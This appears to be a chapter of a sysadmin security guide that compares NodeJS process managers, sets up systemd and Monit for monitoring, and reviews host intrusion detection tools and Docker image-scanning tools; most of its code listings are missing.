All the following offerings that I have evaluated, target different scenarios. I have listed the pros and cons for each of them and where I think they fit into a potential solution to monitor your web applications (I am leaning toward NodeJS) and make sure they keep running in a healthy state. I have listed the goals I was looking to satisfy.
For me I have to have a good knowledge of the landscape before I commit to a decision and stand behind it. I like to know I have made the best decision based on all the facts that are publicly available. Therefore, as always, it is my responsibility to make sure I have done my research in order to make an informed and ideally best decision possible. I am pretty sure my evaluation was un-biased, as I had not used any of the offerings other than forever before.
I looked at quite a few more than what I have detailed below, but the following candidates I felt were worth spending some time on.
Keep in mind, that everyones requirements will be different, so rather than tell you which to use because I do not know your situation, I have listed the attributes (positive, negative and neutral) that I think are worth considering when making this choice. After the evaluation we make some decisions and start the configuration of the chosen offerings.
The following tools were my choice based on the above criterion.
You will have one of these running on your standard GNU/Linux box.
These are system and service managers for Linux. Upstart and the later systemd were developed as replacements for the traditional init daemon (Sysvinit), which all depend on init. Init is an essential package that pulls in the default init system. In Debian, starting with Jessie, systemd is your default system and service manager.
There is some helpful info on the differences between Sysvinit and systemd, links in the attributions chapter.
systemd
As I have systemd installed out of the box on my test machine (Debian Stretch), I will be using this for my set-up.
Documentation
There is a well written comparison with Upstart, systemd, Runit and even Supervisor.
Running the likes of the below commands will provide some good details on how these packages interact with each other:
These system and service managers all run as PID 1
and start the rest of your system. Your Linux system will more than likely be using one of these to start tasks and services during boot, stop them during shutdown and supervise them while the system is running. Ideally you are going to want to use something higher level to look after your NodeJS application(s). See the following candidates.
and its web UI can run any kind of script continuously (whether it is written in NodeJS or not). This was not always the case though. It was originally targeted toward keeping NodeJS applications running.
Requires NPM to install globally. We already have a package manager on Debian and all other main-stream Linux distros. Even Windows has package managers. Installing NPM just adds more attack surface area. Unless it is essential, I would rather do without NPM on a production server where we are actively working to reduce the installed package count and disable everything else we can. We could install forever on a development box and then copy to the production server, but it starts to turn the simplicity of a node module into something not as simple, which then makes native offerings such as Supervisor, Monit and even Passenger look even more attractive.
Overall Thoughts
For me, I am looking for a tool set that is a little smarter, knows when the application is struggling and when someone has tampered with it. Forever does not satisfy the requirements. There is often a balancing act between not doing enough and doing too much. If the offering “can” do to much but does not actually do it (get in your way), then it is not so bad, as you do not have to use all the features. In saying that, it is extra attack surface area that can and will be exploited, it is just a matter of time.
Younger than forever, but seems to have quite a few more features. I am not sure about production ready though. Let us elaborate.
I prefer the dark cockpit approach from my monitoring tools. What I mean by that is, I do not want to be told that everything is OK all the time. I only want to be notified when things are not OK. PM2 provides a display of memory and cpu usage of each app with pm2 monit
, I do not have the time to sit around watching statistics that do not need to be watched and most system administrators do not either, besides, when we do want to do this, we have perfectly good native tooling that system administrators are comfortable using. Amongst the list of commands that PM2 provides, most of this functionality can be performed by native tools, so I am not sure what benefit this adds.
PM2 also seems to provide logging. My applications provide their own logging and we have the systems logging which provides aggregates and singular logs, so again I struggle to see what PM2 is offering here that we do not already have.
As mentioned on the github README: “PM2 is a production process manager for Node.js applications with a built-in load balancer“. This “Sounds” and at the initial glance looks shiny. Very quickly you should realise there are a few security issues you need to be aware of though.
The word “production” is used but it requires NPM to install globally. We already have a package manager on Debian and all other main-stream Linux distros. As previously mentioned, installing NPM adds unnecessary attack surface area. Unless it is essential and it should not be, we really do not want another application whos sole purpose is to install additional attack surface in the form of extra packages. NPM contains a huge number of packages, that we really do not want access to on a production server facing the internet. We could install PM2 on a development box and then copy to the production server, but it starts to turn the simplicity of a node module into something not as simple, which then, as does forever, makes offerings like Supervisor, Monit and even Passenger look even more attractive.
At the time of writing this, PM2 is about four years old with about 440 open issues on github, most quite old, with 29 open pull requests.
Yes, it is very popular currently. That does not tell me it is ready for production though. It tells me the marketing is working.
“Is your production server ready for PM2?” That phrase alone tells me the mind-set behind the project. I would much sooner see it worded the other way around. Is PM2 ready for my production server? Your production server(s) are what you have spent time hardening, I am not personally about to compromise that work by consuming a package that shows me no sign of up-front security considerations in the development of this tool. You are going to need a development server for this, unless you honestly want development tools installed on your production server (NPM, git, build-essential and NVM) on your production server? Not for me or my clients thanks.
If you have considered the above concerns and can justify adding the additional attack surface area, check out the features if you have not already.
Features that Stand Out
They are also listed on the github repository. Just beware of some of the caveats. Like for the load balancing: “we recommend the use of node#0.12.0+ or node#0.11.16+. We do not support node#0.10.*’s cluster module anymore”. 0.11.16 is unstable, but hang-on, I thought PM2 was a “production” process manager? OK, so were happy to mix unstable in with something we label as production?
On top of NodeJS, PM2 will run the following scripts: bash, python, ruby, coffee, php, perl.
After working through the offered features, I struggled to find value in features that were not already offered natively as part of the GNU/Linux Operation System.
PM2 has Start-up Script Generation, which sounds great, but if using systemd as we do below, then it is just a few lines of config for our unit file. This is a similar process no matter what init system you have out of the box.
Documentation
The documentation has nice eye candy which I think helps to sell PM2.
PM2 has what they call an Advanced Readme which at the time of reviewing, didn’t appear to be very advanced and had a large collection of broken links.
Does it Meet Our Goals
Overall Thoughts
For me, the architecture does not seem to be heading in the right direction to be used on a production internet facing web server, where less is better, unless the functionality provided is truly unique and adds more value than the extra attack surface area removes. I would like to see this change, but I do not think it will, the culture is established.
Supervisor is a process manager with a lot of features and a higher level of abstraction than the likes of the above mentioned Sysvinit, upstart, systemd, Runit, etc, so it still needs to be run by an init daemon in itself.
From the docs: “It shares some of the same goals of programs like launchd, daemontools, and runit. Unlike some of these programs, it is not meant to be run as a substitute for init as “process id 1”. Instead it is meant to be used to control processes related to a project or a customer, and is meant to start like any other program at boot time.” Supervisor monitors the state of processes. Where as a tool like Monit can perform so many more types of tests and take what ever actions you define.
It is in the Debian repositories and is a trivial install on Debian and derivatives.
Documentation
Main web site (ReadTheDocs)
Does it Meet Our Goals
GET /healthcheck
. If everything goes well it should return HTTP 200
, if not then HTTP 5**
In some cases the restart of the process will solve this issue. httpok
is a Supervisor event listener which makes GET
requests to the configured URL. If the check fails or times out, httpok
will restart the process. To enable httpok
the following lines have to be placed in supervisord.conf
: Overall Thoughts
The documentation is quite good, easy to read and understand. I felt that the config was quite intuitive also. I already had systemd installed out of the box and did not see much point in installing Supervisor as systemd appeared to do everything Supervisor could do, plus systemd is an init system, sitting at the bottom of the stack. In most scenarios you are going to have a Sysvinit or replacement of (that runs with a PID
of 1
), so in many cases Supervisor although it is quite nice is kind of redundant.
Supervisor is better suited to running multiple scripts with the same runtime, for example a bunch of different client applications running on Node. This can be done with systemd and the others, but Supervisor is a better fit for this sort of thing, PM2 also looks to do a good job of running multiple scripts with the same runtime.
Is a utility for monitoring and managing daemons or similar programs. It is mature, actively maintained, free, open source and licensed with GNU AGPL.
It is in the debian repositories (trivial install on Debian and derivatives). The home page told me the binary was just under 500kB. The install however produced a different number:
Monit provides an impressive feature set for such a small package.
Monit provides far more visibility into the state of your application and control than any of the offerings mentioned above. It is also generic. It will manage and/or monitor anything you throw at it. It has the right level of abstraction. Often when you start working with a product you find its limitations, and they stop you moving forward, you end up settling for imperfection or you swap the offering for something else providing you have not already invested to much effort into it. For me Monit hit the sweet spot and never seems to stop you in your tracks. There always seems to be an easy to relatively easy way to get any “monitoring -> take action” sort of task done. What I also really like is that moving away from Monit would be relatively painless also, other than what you would miss. The time investment / learning curve is very small, and some of it will be transferable in many cases. It is just config from the control file.
touch -r
, providing you do it between Monits cycles and you do not necessarily know when they are, unless you have permissions to look at Monits control file. This provides defence in depth though.monitrc
in order to run the Monit cli and/or access the Monit http web UI. At first I thought “is this broken?” I could not even run monit status
(a Monit command). ps told me Monit was running. Then I realised… it is secure by default. You have to actually think about it in order to expose anything. It was this that confirmed Monit was one of the tools for me.0700 (
u=xrw,g=,o=`); Monit will complain and exit otherwise, again, security by default.Documentation
The following was the documentation I used in the same order and I found that the most helpful.
Does it Meet Our Goals
Overall Thoughts
There was accepted answer on Stack Overflow that discussed a pretty good mix and approach to using the right tools for each job. Monit has a lot of capabilities, none of which you must use, so it does not get in your way, as many opinionated tools do and like to dictate how you do things and what you must use in order to do them. I have been using Monit now for several years and just forget that it is even there, until it barks because something is not quite right. Monit allows you to leverage what ever you already have in your stack, it plays very nicely with all other tools. Monit under sells and over delivers. You do not have to install package managers or increase your attack surface other than [apt-get|aptitude] install monit
. It is easy to configure and has lots of good documentation.
I have looked at Passenger before and it looked quite good then. It still does, with one main caveat. It is trying to do to much. One can easily get lost in the official documentation (example of the Monit install (handfull of commands to cover all Linux distributions on one page) vs Passenger install (many pages to get through)). “Passenger is a web server and application server, designed to be fast, robust and lightweight. It runs your web applications with the least amount of hassle by taking care of almost all administrative heavy lifting for you.” I would like to see the actual weight rather than just a relative term “lightweight”. To me it does not look light weight. The feeling I got when evaluating Passenger was similar to the feeling produced with my Ossec evaluation.
The learning curve is quite a bit steeper than all the previous offerings. Passenger has strong opinions that once you buy into could make it hard to use the tools you may want to swap in and out. I am not seeing the UNIX Philosophy here.
If you looked at the Phusion Passenger Philosophy when it was available, seems to have been removed now, you would see some note-worthy comments. “We believe no good software has bad documentation“. If your software is 100% intuitive, the need for documentation should be minimal. Few software products are 100% intuitive, because we only have so much time to develop them. The comment around “the Unix way” is interesting also. At this stage I am not sure this is the Unix way. I would like to spend some time with someone or some team that has Passenger in production in a diverse environment and see how things are working out.
Passenger is not in the Debian repositories, so you would need to add the apt repository.
Passenger is seven years old at the time of writing this, but the NodeJS support is only just over two years old.
Features that Do Not really Stand Out
Sadly there were not many that stood out for me.
Phusion Passenger is a commercial product that has enterprise, custom and open source (which is free and has many features).
Documentation
The following was the documentation I used in the same order and I found that the most helpful.
#passenger
at irc.freenode.net
. I was on there for several days. There was very little activity.Does it Meet Our Goals
Overall Thoughts
I spent quite a while reading the documentation. I just think it is doing to much. I prefer to have stronger single focused tools that do one job, do it well and play nicely with all the other kids in the sand pit. You pick the tool up and it is just intuitive how to use it, and you end up reading docs to confirm how you think it should work. For me, this was not my experience with passenger.
At this point it was fairly clear as to which components I would like to use to keep my NodeJS application(s) monitored, alive and healthy along with any other scripts and processes.
Systemd and Monit.
Going with the default for the init system should give you a quick start and provide plenty of power. Plus it is well supported, reliable, feature rich and you can manage anything/everything you want without installing extra packages.
For the next level up, I would choose Monit. I have now used it in production and it has taken care of everything above the init system with a very simple configuration. I feel it has a good level of abstraction, plenty of features, never gets in the way, and integrates nicely into your production OS(s) with next to no friction.
So we have installed Monit with an apt-get install monit
and we are ready to start configuring it.
Will reveal that Monit is running:
The first thing we need to do is make some changes to the control file (/etc/monit/monitrc
in Debian). The control file has sensible defaults already. At this stage I do not need a web UI accessible via localhost or any other hosts, but it still needs to be turned on and accessible by at least localhost. Here is why:
“Note that if HTTP support is disabled, the Monit CLI interface will have reduced functionality, as most CLI commands (such as “monit status”) need to communicate with the Monit background process via the HTTP interface. We strongly recommend having HTTP support enabled. If security is a concern, bind the HTTP interface to local host only or use Unix Socket so Monit is not accessible from the outside.”
In order to turn on the httpd, all you need in your control file for that is:
If you want to receive alerts via email, then you will need to configure that. Then on reload you should get start and stop events (when you quit).
Now if you issue a curl localhost:2812
you should get the web UIs response of a html page. Now you can start to play with the Monit CLI. Monit can also be seen listening in the netstat
output above where we disabled and removed services.
Now to stop the Monit background process use:
You can find all the arguments you can throw at Monit in the documentaion under Arguments, or just issue:
To check the control file for syntax errors:
Also keep an eye on your log file which is specified in the control file:
set logfile /var/log/monit.log
Right. So what happens when Monit dies..?…
Now you are going to want to make sure your monitoring tool that can be configured to take all sorts of actions never just stops running, leaving you flying blind. No noise from your servers means all good right? Not necessarily. Your monitoring tool just has to keep running, no ifs or buts about it. So let us make sure of that now.
When Monit is apt-get install
‘ed on Debian, it gets installed and configured to run as a daemon. This is defined in Monits init script.
Monits init script is copied to /etc/init.d/
and the run levels set-up for it upon installation. This means when ever a run level is entered the init script will be run taking either the single argument of stop
(example: /etc/rc0.d/K01monit
), or start
(example: /etc/rc2.d/S17monit
). Remember we discussed run levels previously?
systemd to the rescue
Monit is very stable, but if for some reason it dies, then it will not be automatically restarted again. In saying that I have never had Monit die on any of my servers being monitored.
This is where systemd comes in. systemd is installed out of the box on Debian Jessie on-wards. Ubuntu uses Upstart on 14.10 which is similar, Ubuntu 15.04 uses systemd. Both SysV init and systemd can act as drop-in replacements for each other or even work along side of each other, which is the case in Debian Jessie. If you add a unit file which describes the properties of the process that you want to run, then issue some magic commands, the systemd unit file will take precedence over the init script (/etc/init.d/monit
).
Before we get started, let us get some terminology established. The two concepts in systemd we need to know about are unit and target.
[Unit]
directive at a minimum. The syntax of the unit files and the target files were derived from Microsoft Windows .ini
files. Now I think the idea is that if you want to have a [Service]
directive within your unit file, then you would append .service
to the end of your unit file name.Now in Debian there are two places that systemd looks for unit files… In order from lowest to highest precedence, they are as follows:
/lib/systemd/system/
(prefix with /usr
dir for archlinux) unit files provided by installed packages. Have a look in here for many existing examples of unit files./etc/systemd/system/
unit files created by the system administrator.As mentioned above, systemd should be the first process started on your Linux server. systemd reads the different targets and runs the scripts within the specific targets target.wants
directory (which just contains a collection of symbolic links to the unit files). For example the target file we will be working with is the multi-user.target
file (actually we do not touch it, systemctl does that for us (as per the magic commands mentioned above)). Just as systemd has two locations in which it looks for unit files. I think this is probably the same for the target files, although there was not any target files in the system administrator defined unit location, but there were some target.wants
files there.
systemd Monit Unit file
I found a template that Monit had already provided for a unit file in
/usr/share/doc/monit/examples/monit.service
. There is also one for Upstart. Copy that to where the system administrator unit files should go, as mentioned above, and make the change so that systemd restarts Monit if it dies for what ever reason. Check the Restart=
options on the systemd.service man page. The following is what my initial unit file looked like:
Now, some explanation. Most of this is pretty obvious. The After=
directive just tells systemd to make sure the network.target
file has been acted on first and of course network.target
has After=network-pre.target
which does not have a lot in it. I am not going to go into this now, as I do not really care too much about it. It works. It means the network interfaces have to be up first. If you want to know how, why, check the systemd NetworkTarget documentation. Type=simple
. Again check the systemd.service man page.
Now to have systemd control Monit, Monit must not run as a background process (the default). To do this, we can either add the set init
statement to Monit’s control file or add the -I
option when running systemd, which is exactly what we have done above. The WantedBy=
is the target that this specific unit is part of.
Now we need to tell systemd to create the symlinks in the /etc/systemd/system/multi-user.target.wants
directory and other things. See the systemctl man page for more details about what enable actually does if you want them. You will also need to start the unit.
Now what I like to do here is:
Then compare this output once we enable the service:
systemd now knows about monit.service
Outputs:
Now start the service:
Now you can check the status
of your Monit service again. This shows terse runtime information about the units or PID you specify (monit.service in our case).
By default this function will show you 10 lines of output. The number of lines can be controlled with the --lines=
option:
Now try kill
ing the Monit process. At the same time, you can watch the output of Monit in another terminal. tmux or screen is helpful for this:
Or you can emulate a nastier termination with SIGKILL
or even SEGV
(which may kill monit faster).
Now when you run another status
command you should see the PID has changed. This is because systemd has restarted Monit.
When you need to make modifications to the unit file, you will need to run the following command after save:
When you need to make modifications to the running services configuration file
/etc/monit/monitrc
for example, you will need to run the following command after save:
Right, we know systemd is always going to be running. So let’s use it to take care of the coarse grained service control. That is keeping your NodeJS service alive.
Using systemd
systemd my-nodejs-app Unit file
You will need to know where your NodeJS binary is. The following will provide the path:
Now create a systemd unit file my-nodejs-app.service
Add the system user and group so systemd can actually run your service as the user you have specified.
Now as we did above, go through the same procedure enable
ing, start
ing and verifying your new service.
Make sure you have your directory permissions set-up correctly and you should have a running NodeJS application that when it dies will be restarted automatically by systemd.
Do not forget to backup all your new files and changes in case something happens to your server.
We are done with systemd for now. The following are some useful resources that I have used:
kill
ing processesUsing Monit
Now just configure your Monit control file. You can spend a lot of time here tweaking a lot more than just your NodeJS application. There are loads of examples around, and the control file itself has lots of commented out examples also. You will find the following the most helpful:
There are a few things that had me stuck for a while. By default Monit only sends alerts on change (dark cockpit approach), not on every cycle if the condition stays the same, unless when you set-up your:
Append receive all alerts
, so that it looks like this:
There is quite a few things you just work out as you go. The main part I used to health-check my NodeJS app was:
Carry on and add to, or uncomment, and modify the monitrc
file, with the likes of:
This is where collectd and graphite come to the party. Both tools do one thing, do it well, and are independent of each other, but are often used together.
Also check the related Statistics Graphing section in the countermeasures section of the Web Applications chapter, where we introduce statsd as the collector for application metrics.
Collectd can be used to feed statistics to many consumers, including AWS CloudWatch via a plugin, but using it with graphite (and ultimately Grafana, which can take inputs from a collection of data sources, including graphite, Elasticsearch, AWS CloudWatch, and others) would provide a much better solution.
“Collectd is a daemon which collects system and application performance metrics” at a configurable frequency. Almost everything in collectd is done with plugins. Most of the over 100 plugins are used to read statistics from the target system, but plugins are also used to define where to send those statistics, and in the case of distributed systems, read those statistics sent from collectd agents. Collectd is an agent based system metrics collection tool. An agent is deployed on every host that needs to be monitored.
If you want to send statistics over the network, then the network plugin must be loaded. collectd is capable of cryptographically signing or encrypting the network traffic it transmits. Collectd is not a complete monitoring solution by it self.
The collectd daemon has no external dependencies and should run on any POSIX supporting system, such as Linux, Solaris, Max OS X, AIX, the BSDs, and probably many others.
Graphite is a statistics storage and visualisation component which consists of:
Graphite has excellent official and community provided documentation.
There are a large number of tools that can be integrated with graphite.
Graphite can take some work to deploy, This can be made easier several ways. You could deploy it with your favourite configuration management tool, such as with an ansible-graphite playbook, or perhaps with one of the many collectd-graphite-docker type containers.
You can even do better than graphite by adding the likes of Grafana
Collectd can be used to send statistics locally or remotely. It can be setup as an agent and server, along with Graphite on a single machine.
Another common deployment scenario which is more interesting is to have a collection of hosts (clients/agents) that all require statistics gathering from them, and a server that listens for the data coming from all of the clients/agents. Let us see how this looks:
collectd
(which depends on collectd-core
which includes many plugins) and collectd-utils
In this case, each collectd agent is sending its statistics from its Network plugin to the graphing servers network interface (achieving the same result as the below netcat command), which is picked up by the collectd Network plugin and flows through to the collectd write_graphite
plugin, which sends the statistics using the plain text transfer protocol (metric-name actual-value timestamp-in-epoch) to graphites listening service called carbon (usually to port 2003). Carbon only accepts a single value per interval, which is 10 seconds by default. Carbon writes the data to the whisper library which is responsible for storing to its data files. graphite-web reads the data points from the wisper files, and provides user interface and API for rendering dashboards and graphs.
I also looked into Raygun which provides visibility into many aspects of your applications. Raygun is an all-in-one offering, but does not focus on server statistics.
I recently performed an in-depth evaluation of a couple of great HIDS available. The choice of which candidates to take into the second round came from an initial evaluation of a larger collection of HIDS. First I will briefly discuss the full collection I looked at, as these also have some compelling features and reasons as to why you may want to use them in your own VPSs. I will then discuss the two that I was the most impressed with, and dive into some more details around the winner, why, and how I had it configured and running in my lab.
The best time to install a HIDS is on a fresh installed system before you open the host up to the internet or even your LAN, especially if it is corporate. Of course if you do not have that luxury, there are a bunch of tools that can help you determine if you are already owned. Be sure to run one or more over your target system(s) before your HIDS bench-marks it, otherwise you could be bench-marking an already compromised system.
Is a HIDS that stores a good known state of vital system files of your choosing and can be set-up to notify an administrator upon change in the files. Tripwire stores cryptographic hashes (deltas) in a database and compares them with the files it has been configured to monitor changes on. DigitalOcean had a tutorial on setting Tripwire up. Most of what you will find around Tripwire now are the commercial offerings.
Is a similar offering to Tripwire for POSIX compliant systems. RkHunter scans for rootkits, backdoors, checks on the network interfaces and local exploits by testing for:
Version 1.4.2 (24/02/2014) now checks the ssh
, sshd
and telent
, although you should not have telnet installed. This could be useful for mitigating non-root users running a trojanised sshd on a 1025-65535 port. You can run ad-hoc scans, then set them up to be run with cron. Debian Jessie has this release in its repository. Any Debian distro before Jessie is on 1.4.0-1 or earlier.
The latest version you can install for Linux Mint Rosa (17.3) within the repositories is 1.4.0-3 (01/05/2012). Linux Mint Sarah (18) within the repositories is 1.4.2-5
It is a good idea to run a couple of these types of scanners. Hopefully what one misses the other will not. Chkrootkit scans for many system programs, some of which are cron, crontab, date, echo, find, grep, su, ifconfig, init, login, ls, netstat, sshd, top and many more. All the usual targets for attackers to modify. You can specify if you do not want them all scanned. Chkrootkit runs tests such as:
While not strictly a HIDS, Unhide is quite a useful forensics tool for working with your system if you suspect it may have been compromised.
Unhide is a forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hidden technique. Unhide runs on Unix/Linux and Windows Systems. It implements six main techniques.
/proc
vs /bin/ps
output/bin/ps
with info gathered by walking through the procfs
(ONLY for unhide-linux version)./bin/ps
with info gathered from syscalls
(syscall scanning)/bin/ps
output vs /proc
, procfs
walking and syscall
(ONLY for unhide-linux version). Reverse search, verify that all threads seen by ps
are also seen in the kernel
./proc
, procfs
walking and syscall
vs /bin/ps
output (ONLY for unhide-linux version). This technique is about 20 times faster than tests 1+2+3 but may give more false positives.Unhide includes two utilities: unhide and unhide-tcp.
unhide-tcp identifies TCP/UDP ports that are listening but are not listed in /bin/netstat through brute forcing of all TCP/UDP ports available.
Can also be used by rkhunter in its daily scans. Unhide was number one in the top 10 toolswatch.org security tools pole
Is a HIDS that also has some preventative features. This is a pretty comprehensive offering with a lot of great features.
The idea of Stealth is to do a similar job as the above file integrity checkers, but to leave almost no sediments on the tested computer (called the client). A potential attacker therefore does not necessarily know that Stealth is in fact checking the integrity of its clients files. Stealth is installed on a different machine (called the controller) and scans over SSH.
The faster you can respond to an attacker modifying system files, the more likely you are to circumvent their attempts. Ossec provides real-time cheacking. Stealth provides agent-less (runs from another machine) checking, using the checksum programme of your choice that it copies to the controller on first run, ideally before it is exposed in your DMZ.
You can find the source on github
Who is Behind Ossec?
Many developers, contributors, managers, reviewers, translators. Infact the OSSEC team looks almost as large as the Stealth user base, well, that is a slight exaggeration.
Documentation
There is Lots of documentation. It is not always the easiest to navigate because you have to understand so much up front. There is lots of buzz on the inter-webs and there are several books.
Community / Communication
IRC channel #ossec on irc.freenode.org Although it is not very active.
Components
There are quite a few other ancillary components also.
You can also go the agent-less route which may allow the Manager to perform file integrity checks using agent-less scripts. As with Stealth, you have still got the issue of needing to be root in order to read some of the files.
Agents can be installed on VMware ESX but from what I have read it is quite a bit of work.
Features in a nut-shell
What I like
To me, the ability to scan in real-time off-sets the fact that the agents in most cases have binaries installed. This hinders the attacker from covering their tracks.
Can be configured to scan systems in real–time based on inotify events.
Backed by a large company Trend Micro.
Options: Install options for starters. You have the options of:
Can install a web UI on the manager, so you need Apache, PHP, MySQL.
If you are going to be checking many machines, OSSEC will scale.
What I like less
And why it rose to the top.
You can find the source on github
Who is Behind Stealth?
Author: Frank B. Brokken. An admirable job for one person. Frank is not a fly-by-nighter though. Stealth was first presented to Congress in 2003. It is still actively maintained and used by a few. It is one of GNU/Linux’s dirty little secrets I think. It is a great idea implemented, makes a tricky job simple and does it in an elegant way.
All hosted on github.
Once you install Stealth, all the documentation can be found by sudo updatedb && locate stealth
. I most commonly used: HTML docs /usr/share/doc/stealth-doc/manual/html/
and /usr/share/doc/stealth-doc/manual/pdf/stealth.pdf
for easy searching across the HTML docs.
/usr/share/doc/stealth/stealthman.html
/usr/share/doc/stealth/examples/
Binaries
Debian Stretch: has 4.01.05-1
Linux Mint 18 (Sarah) has 4.01.04-1
Last time I installed Stealth I had to either go out of band to get a recent version or go with a much older version. These repositories now have very recent releases though.
Community / Communication
There is no community really. I see it as one of the dirty little secretes that I am surprised many diligent sys-admins have not jumped on. The author is happy to answer emails. The author is more focussed on maintaining a solid product than marketing.
Components
Architecture
The Monitor stores one to many policy files. Each of which is specific to a single client and contains USE
directives and commands. Its recommended policy to take copies of the client utilities such as the hashing programme sha1sum
, find
and others that are used extensively during the integrity scans and copy them to the Monitor to take bench-mark hashes. Subsequent runs will do the same to compare with the initial hashes stored before the client utilities are trusted.
Features in a nut-shell
File integrity tests leaving virtually no sediments on the tested client.
Stealth subscribes to the “dark cockpit” approach. I.E. no mail is sent when no changes are detected. If you have a MTA, Stealth can be configured to send emails on changes it finds.
What I like
sha1sum
on the clients that Stealth uses to perform its integrity checks, Stealth would somehow have to be fooled into thinking that the changed hash of the sha1sum
it has just copied to the Monitor is the same as the previously recorded hash that it did the same with. If the previously recorded hash is removed or does not match the current hash, then Stealth will fire an alert off.auth.log
. This could actually be months ago, as the connection remains active for the life of Stealth. The login could be from a user doing anything on the client. It is very discrete.--random-interval
and --repeat
options. E.g. --repeat 60 --random-interval 30
results in new Stealth-runs on average every 75 seconds. It can usually take a couple of minutes to check all the important files on a file system, so you would probably want to make the checks several minutes apart from each other.What I like less
In making all of my considerations, I changed my mind quite a few times on which offerings were most suited to which environments. I think this is actually a good thing, as I think it means my evaluations were based on the real merits of each offering rather than any biases.
The simplicity of Stealth, flatter learning curve and its over-all philosophy is what won me over. Although, I think if you have to monitor many Agents / Clients, then Ossec would be an excellent option, as I think it would scale well.
I installed stealth and stealth-doc via synaptic package manager. Then just did a locate
for stealth to find the docs and other example files. The following are the files I used for documentation, how I used them and the tab order that made sense to me:
The files I would need to copy and modify were:
/usr/share/doc/stealth/scripts/usr/bin/stealthcleanup.gz
/usr/share/doc/stealth/scripts/usr/bin/stealthcron.gz
/usr/share/doc/stealth/scripts/usr/bin/stealthmail.gz
Files I used for reference to build up the policy file:
/usr/share/doc/stealth/examples/demo.pol.gz
/usr/share/doc/stealth/examples/localhost.pol.gz
/usr/share/doc/stealth/examples/simple.pol.gz
As mentioned above, providing you have a working MTA, then Stealth will just do its thing when you run it. The next step is to schedule its runs. This can be also (as mentioned above) with a pseudo random interval.
It is my intention to provide a high level over view of the concepts you will need to know in order to establish a somewhat secure environment around the core Docker components and your containers. There are many resources available, and the Docker security team is hard at work constantly trying to make the task of improving security around Docker easier.
Do not forget to check the Additional Resources section for material to be consumed in parallel with the Docker Countermeasures, such as the excellent CIS Docker Benchmark and an interview of the Docker Security Team Lead I carried out with Diogo Mónica.
Cisecurity has an excellent resource for hardening docker images which the Docker Security team helped with.
“Docker Security Scanning is available as an add-on to Docker hosted private repositories on both Docker Cloud and Docker Hub.”, you also have to opt in and pay for it. Docker Security Scanning is also now available on the new Enterprise Edition. The scan compares the SHA of each component in the image with those in an up to date CVE database for known vulnerabilities. This is a good start, but not free and does not do enough. Images are scanned on push and the results indexed so that when new CVE databases are available, comparisons can continue to be made.
It’s up to the person consuming images from docker hub to assess whether or not they have vulnerabilities in them. Whether un-official or official, it is your responsibility. Check the Hardening Docker Host, Engine and Containers section for tooling to assist with finding vulnerabilities in your Docker hosts and images.
Your priority before you start testing images for vulnerable contents, is to understand the following:
sha256:<the-hash>
DOCKER_CONTENT_TRUST
environment variable must be set to 1
, and the DOCKER_CONTENT_TRUST_SERVER
must be set to the URL of the Notary server you setup.
Now the producer can sign their image, but first, they need to generate a key pair. Once they have done that, when the image is pushed to the registry, it is signed with their private (tagging) key.
When the image consumer pulls the signed image, Docker Engine uses the publishers public (tagging) key to verify that the image you are about to run is cryptographically identical to the image the publisher pushed.
Docker Content Trust also uses the Timestamp key when publishing the image, this makes sure that the consumer is getting the most recent image on pull.
Notary is based on a Go implementation of The Update Framework (TUF)
FROM
instruction in your Dockerfile
, when you pull
the same image will be fetched.If you are already doing the last step from above, then fetching an image with a very similar name becomes highly unlikely.
In order to run containers as a non-root user, the user needs to be added in the (preferably base) image (Dockerfile
) if it is under your control, and set before any commands you want run as a non-root user. Here is an example of the NodeGoat image:
As you can see on line 4 we create our nodegoat_docker
user.
On line 8 we add our non-root user to the image with no ability to login.
On line 15 we change the ownership of the $workdir
so our non-root user has access to do the things that we normally have permissions to do without root, such as installing npm packages and copying files, as we see on line 20 and 21, but first we need to switch to our non-root user on line 18. On lines 25 and 26 we need to reapply ownership and permissions due to the fact that docker does not COPY
according to the user you are set to run commands as.
Without reapplying the ownership and permissions of the non-root user as seen above on lines 25 and 26, the container directory listings would look like this:
With reapplication of the ownership and permissions of the non-root user, as the Dockerfile
is currently above, the container directory listings look like the following:
An alternative to setting the non-root user in the Dockerfile
, is to set it in the docker-compose.yml
, providing the non-root user has been added to the image in the Dockerfile
. In the case of NodeGoat, the mongo Dockerfile
is maintained by DockerHub, and it adds a user called mongodb
. Then in the NodeGoat projects docker-compose.yml
, we just need to set the user, as seen on line 13 below:
Alternatively, a container may be run as a non-root user by
docker run -it --user lowprivuser myimage
but this is not ideal, the specific user should usually be part of the build.
Make sure you keep your host kernel well patched, as it is a huge attack surface, with all of your containers accessing it via System calls.
The space for tooling to help find vulnerabilities in code, packages, etc within your Docker images has been noted, and tools provided. The following is a sorted list of what feels like does the least and is the simplest in terms of security/hardening features to what does the most, not understating tools that do a little, but do it well.
These tools should form a part of your secure and trusted build pipeline / software supply-chain.
“A smarter Dockerfile linter that helps you build best practice Docker images.”
is a mature, free and open source auditing tool for Linux/Unix based systems. There is a Docker plugin available which allows one to audit Docker, its configuration and containers, but an enterprise license is required, although it is very cheap.
is a shell script, that can be downloaded from github and executed immediately, run from a pre-built container, or using Docker Compose after git cloning. Docker Bench tests many host configurations and Docker containers against the CIS Docker Benchmark.
is an open source project that appears to do a similar job to Docker Security Scanning, but it is free. You can use it on any image you pull, to compare the hashes of the packages from every container layer within, with hashes of the CVE data sources. You could also use Clair on your CI/CD build to stop images being deployed if they have packages with hashes that match those of the CVE data sources. quay.io was the first container registry to integrate with Clair.
is a free and open source framework for static analysis of Docker images. It does more than Clair, it can optionally communicate with Docker registries, private or Docker Hub, to obtain image hashes, it can then tell Docker Daemon to pull the images locally. Collector then docker run
’s each container in turn to be inspected. Each container runs a banyan or user-specified script which outputs the results to stdout. Collector collates the containers output, and can send this to Banyan Analyser for further analysis. Collector has a pluggable, extensible architecture. Collector can also: Enforce policies, such as no unauthorised user accounts, etc. Make sure components are in their correct location. Banyanops was the organisation that blogged about the high number of vulnerable packages on Docker Hub. They have really put their money where their mouth was now.
is a set of non-free tools providing visibility, control, analytics, compliance and governance for containers in the cloud or on-prem.
There are two main parts, a hosted web service, and a set of open source CLI query tools.
The hosted service selects and analyses popular container images from Docker Hub and other registries. The metadata it creates is provided as a service to the on-premise CLI tools.
It performs a similar job to that of Clair, but does not look as simple. Also looks for source code secrets, API keys, passwords, etc in images.
Designed to integrate into your CI/CD pipeline. Integrates with Kubernetes, Docker, Jenkins, CoreOS, Mesos
is a fairly comprehensive and complete non open source offering with a free developer edition. The following details were taken from TwistLock marketing pages:
Features of Trust:
Features of Runtime:
mnt
